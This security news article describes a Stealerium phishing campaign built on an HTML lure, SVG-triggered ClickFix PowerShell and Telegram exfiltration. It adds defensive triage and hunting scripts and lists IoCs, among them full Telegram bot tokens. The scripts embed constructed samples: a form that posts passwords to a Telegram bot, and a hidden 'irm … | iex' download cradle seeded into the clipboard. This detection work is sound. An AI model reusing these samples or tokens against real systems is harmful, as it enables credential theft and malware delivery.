
Security analysts warn that the attack combines a polished HTML phishing page with a follow-up PowerShell execution chain that installs the Stealerium infostealer.
The campaign begins with a phishing email containing a well-crafted HTML attachment titled Virtual-Gift-Card-Claim.html.
When opened, the page displays a realistic company-branded form prompting users to verify their details to claim an award.
Once credentials are entered, the page posts them to the Telegram Bot API using bot token 6926474815:AAHMa86FvgJGailNJ2EzmIgA8hk_nzb5KvA and chat ID 875787587; because the lure is a local HTML attachment, that traffic goes from the victim's browser to api.telegram.org, not to an attacker-owned web server.
From Phishing to PowerShell Infection
The second stage is a malicious image file, account-verification-form.svg, carrying obfuscated JavaScript. SVG is an XML format that may contain script elements and event-handler attributes, so a browser runs that code as soon as the file is opened; nothing is "executed" in the sense of a binary.
When the SVG is opened, the script launches a PowerShell-based ClickFix chain: the victim is shown a fake verification error and told to paste a prepared command, so the payload is started by the user through powershell.exe, a signed Microsoft binary, rather than through an exploit. That is what lets it slip past controls tuned for malicious executables.
The pasted command then fetches further stages from 31.57.147.77:6464, a raw IP on a non-standard port, via endpoints such as /getcmd, /gethta, /getexe, and /getdll; the names suggest the stager pulls a command string, an HTA, an executable and a DLL in turn.
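The following Python script is an added example, not code from the article or from any vendor, showing what a mail gateway or SOC analyst can pull out of attachments shaped like the two described above: active content inside an SVG, Telegram bot tokens and chat IDs, raw IP:port stager URLs, clipboard seeding and embedded PowerShell. The two sample attachments are constructed; the Telegram token format (numeric bot ID, colon, 35-character secret), the clipboard-seeding heuristic and the 192.0.2.10 address are assumptions for the example.

```python
"""Static triage of a suspicious HTML or SVG e-mail attachment.

Added example, not code from the article or from any vendor. The two sample
attachments are constructed to mimic the shapes the article describes; the
regexes encode Telegram's bot-token format and common ClickFix hallmarks,
which are assumptions about the technique, not strings taken from samples.
"""
import re
from dataclasses import dataclass

# Telegram bot tokens are "<numeric bot id>:<35-char secret>" (format assumption).
TELEGRAM_TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# chat_id as a form field, query parameter or JSON key; group chats are negative.
CHAT_ID_RE = re.compile(r"chat_id\W{1,5}(-?\d{6,})")
# Raw http(s)://IP:port URLs with an optional path, the stager pattern in the article.
IP_PORT_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d{2,5})(/[\w./-]*)?")
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
# Event-handler attributes and javascript: URLs also run when an SVG is rendered.
INLINE_HANDLER_RE = re.compile(r"\bon(?:load|click|error|begin)\s*=|javascript:", re.I)
# ClickFix hallmark (heuristic assumption): the script pre-loads the clipboard
# with a PowerShell one-liner that the victim is told to paste into Win+R.
CLIPBOARD_RE = re.compile(r"clipboard\.writeText|execCommand\(\s*['\"]copy", re.I)
POWERSHELL_RE = re.compile(r'powershell(?:\.exe)?[^"<\n]*', re.I)
BLOCK_KINDS = {"svg_active_content", "clipboard_seeding", "powershell_command", "telegram_bot_token"}


@dataclass(frozen=True)
class Finding:
    kind: str
    value: str


def triage_attachment(filename: str, content: str) -> list[Finding]:
    """Return the indicators found in one attachment, in a stable order."""
    findings: list[Finding] = []
    # Script inside an image is never expected in a legitimate award form.
    if filename.lower().endswith(".svg") and (SCRIPT_RE.search(content) or INLINE_HANDLER_RE.search(content)):
        findings.append(Finding("svg_active_content", filename))
    for m in TELEGRAM_TOKEN_RE.finditer(content):
        findings.append(Finding("telegram_bot_token", m.group(1)))
    for m in CHAT_ID_RE.finditer(content):
        findings.append(Finding("telegram_chat_id", m.group(1)))
    for m in IP_PORT_URL_RE.finditer(content):
        host, port, path = m.groups()
        findings.append(Finding("ip_port_url", f"{host}:{port}{path or ''}"))
    if CLIPBOARD_RE.search(content):
        findings.append(Finding("clipboard_seeding", "script writes to the clipboard"))
    for m in POWERSHELL_RE.finditer(content):
        findings.append(Finding("powershell_command", m.group(0).strip()))
    return findings


def verdict(findings: list[Finding]) -> str:
    """block: hard indicators of the chain; review: weaker hits; clean: nothing."""
    kinds = {f.kind for f in findings}
    if kinds & BLOCK_KINDS:
        return "block"
    return "review" if kinds else "clean"


# Constructed sample 1: a credential form that posts straight to a Telegram bot.
FAKE_TOKEN = "1234567890:" + "A" * 35  # placeholder shaped like a real token
SAMPLE_HTML = f"""<html><body><h2>Executive Award: verify your details</h2>
<form id="claim"><input name="email"><input name="password" type="password">
<button>Claim</button></form>
<script>
document.getElementById("claim").onsubmit = async (e) => {{
  e.preventDefault();
  const text = [...new FormData(e.target)].join("|");
  await fetch("https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage", {{
    method: "POST", body: JSON.stringify({{ chat_id: "111222333", text }})
  }});
}};
</script></body></html>"""

# Constructed sample 2: an SVG whose script seeds the clipboard with a stager.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" onload="init()">
<script><![CDATA[
function init() {
  var cmd = "powershell -w hidden -nop -c 'irm http://192.0.2.10:6464/getcmd | iex'";
  navigator.clipboard.writeText(cmd);
  alert("Verification failed. Press Win+R, then Ctrl+V and Enter to fix.");
}
]]></script></svg>"""

if __name__ == "__main__":
    for name, body in (("Virtual-Gift-Card-Claim.html", SAMPLE_HTML), ("account-verification-form.svg", SAMPLE_SVG)):
        hits = triage_attachment(name, body)
        print(name, verdict(hits), [(h.kind, h.value) for h in hits])
```

The token regex deliberately anchors on a non-digit to the left rather than a word boundary, because the token normally appears as `/bot<id>:<secret>/` in the API URL and a `\b` would refuse to match after the letter `t`. Treat any hit on a bot token in an attachment as decisive: legitimate corporate forms do not embed Telegram credentials.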

This chain eventually drops a Stealerium dynamic-link library (DLL), identified by MD5 602ac35cc1e49320493eb54bde62b760 and SHA-256 88feadbb2f9548d3c0cb9c6519bcea476acf9ac2a3eeccde5655457cbba29db4.
Once executed, Stealerium collects browser data, cryptocurrency wallets, and saved credentials and sends them through a second Telegram bot token (6926474815:AAFx9tLAnf5OAVQZp2teS3G2_6T1wCP67xM, chat ID -4224073938). Note that the numeric bot ID before the colon is the same as in the phishing-stage token, so both stages appear to use one bot whose token was regenerated, which points to a single operator.
Investigators also tie the payload server to the same IP address seen in the phishing stage and to a distinctive hard-coded C2 key, “StealeriumC2SecretKey123”, a string worth adding to file and memory scans.
Stealerium AES-encrypts its outbound traffic, so content signatures on the wire will not fire; network detection has to key on the destinations (the Telegram API and 31.57.147.77:6464) and on which process is talking, rather than on what is being sent.
Multi-Stage Loaders on the Rise
The “Executive Award” campaign is another example of threat actors blending social engineering with multi-stage loaders to raise their success rate.
By luring victims with corporate-themed incentives and chaining into PowerShell through ClickFix social engineering rather than an exploit, the attackers give email filters no binary to inspect and leave endpoint tools watching a signed Microsoft process that the user started.
Indicators of compromise (IoCs) include the hashes of the malicious HTML and SVG files, the Stealerium DLL hashes, the Telegram bot tokens and chat IDs, and the network artifacts tied to 31.57.147.77:6464.
Security teams are urged to block these indicators, alert on PowerShell processes that make outbound connections (particularly to raw IPs on non-standard ports), and block or proxy-allowlist api.telegram.org, which both the phishing page and the stealer depend on for exfiltration.
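The hunting logic below is an added example, not code from the article or from any product, turning the two recommendations above into rules run over endpoint telemetry: a ClickFix launch (PowerShell spawned by explorer.exe with hidden-window or download-cradle arguments), any network connection made by PowerShell, and any process other than an allowlisted client reaching the Telegram API. The event records are constructed and use a simplified, hypothetical JSON schema; real Sysmon or EDR field names differ and would need mapping, and the `telegram.exe` allowlist and 192.0.2.10 / 203.0.113.5 addresses are assumptions.

```python
"""Hunting rules for the ClickFix -> PowerShell -> Telegram exfiltration chain.

Added example, not from the original article or any vendor product. The
telemetry is constructed and uses a simplified hypothetical schema
(type/host/image/parent/cmdline/dest_ip/dest_port/dest_host).
"""
import json
import re

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# ClickFix pastes land in the Run dialog, so the shell is spawned by explorer.exe.
USER_SHELL_PARENTS = {"explorer.exe"}
# Assumption: only the desktop client is expected to talk to the Telegram API.
TELEGRAM_ALLOWLIST = {"telegram.exe"}
TELEGRAM_HOSTS = {"api.telegram.org"}
# Stager-style switches: hidden window, no profile, encoded command, policy bypass.
PS_FLAG_RE = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|e(?:nc|ncodedcommand)?"
    r"|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)
# Download cradles and the aliases the one-liners favour.
PS_DOWNLOAD_RE = re.compile(
    r"\b(?:irm|iwr|iex|invoke-restmethod|invoke-webrequest|invoke-expression"
    r"|downloadstring|downloadfile)\b", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list[dict]:
    """Apply the three hunting rules to one event; return zero or more alerts."""
    alerts: list[dict] = []
    image = basename(ev.get("image", ""))
    base = {"host": ev.get("host"), "image": image}

    if ev.get("type") == "process" and image in POWERSHELL_IMAGES:
        cmd = ev.get("cmdline", "")
        flags = sorted({m.group(0).lower() for m in PS_FLAG_RE.finditer(cmd)})
        downloads = sorted({m.group(0).lower() for m in PS_DOWNLOAD_RE.finditer(cmd)})
        parent = basename(ev.get("parent", ""))
        # Rule 1: PowerShell launched from the user's shell with stager-style
        # flags or download cmdlets is the ClickFix signature.
        if parent in USER_SHELL_PARENTS and (flags or downloads):
            alerts.append({**base, "rule": "clickfix_powershell", "severity": "high",
                           "parent": parent, "flags": flags, "downloads": downloads})
        elif downloads:
            alerts.append({**base, "rule": "powershell_download_cradle", "severity": "medium",
                           "parent": parent, "downloads": downloads})

    elif ev.get("type") == "network":
        dest_host = (ev.get("dest_host") or "").lower()
        dest = f"{ev.get('dest_ip')}:{ev.get('dest_port')}"
        # Rule 2: PowerShell rarely needs the network on a workstation; the
        # stager in this campaign talks to a raw IP on a non-standard port.
        if image in POWERSHELL_IMAGES:
            alerts.append({**base, "rule": "powershell_network", "severity": "high",
                           "dest": dest, "dest_host": dest_host,
                           "nonstandard_port": ev.get("dest_port") not in (80, 443)})
        # Rule 3: anything but the allowlisted client reaching the Telegram API.
        if dest_host in TELEGRAM_HOSTS and image not in TELEGRAM_ALLOWLIST:
            alerts.append({**base, "rule": "telegram_api_unexpected_process",
                           "severity": "high", "dest": dest})
    return alerts


def hunt(jsonl: str) -> list[dict]:
    """Run the rules over newline-delimited JSON telemetry."""
    alerts: list[dict] = []
    for line in jsonl.splitlines():
        if line.strip():
            alerts.extend(evaluate(json.loads(line)))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed telemetry: the ClickFix launch, its two connections, a benign
# Telegram client session and a benign scheduled PowerShell script.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"type": "process", "host": "WS-FIN-07", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"type": "process", "host": "WS-FIN-07", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -nop -c \"irm http://192.0.2.10:6464/getcmd | iex\""},
    {"type": "network", "host": "WS-FIN-07", "image": PS,
     "dest_ip": "192.0.2.10", "dest_port": 6464, "dest_host": ""},
    {"type": "network", "host": "WS-FIN-07", "image": PS,
     "dest_ip": "203.0.113.5", "dest_port": 443, "dest_host": "api.telegram.org"},
    {"type": "network", "host": "WS-FIN-07", "image": r"C:\Users\alice\AppData\Roaming\Telegram Desktop\Telegram.exe",
     "dest_ip": "203.0.113.5", "dest_port": 443, "dest_host": "api.telegram.org"},
    {"type": "process", "host": "WS-FIN-07", "image": PS, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "powershell -File C:\\Scripts\\inventory.ps1"},
])

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Rule 1 keys on the parent process because the ClickFix lure has the victim paste into the Run dialog, which makes explorer.exe the parent; a scheduled script launched by svchost.exe with no cradle produces nothing, as the last sample event shows. Rule 2 fires on any PowerShell network activity and simply annotates the port, since the stager's 6464 is the kind of detail an analyst wants surfaced rather than filtered on.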
Early detections suggest that this campaign targets enterprise users, focusing on those with finance or administrative roles, where stolen credentials may grant access to sensitive corporate data or payment systems.
The post New Stealerium Malware Campaign Masquerades as “Executive Award” Using ClickFix appeared first on Cyber Security News.
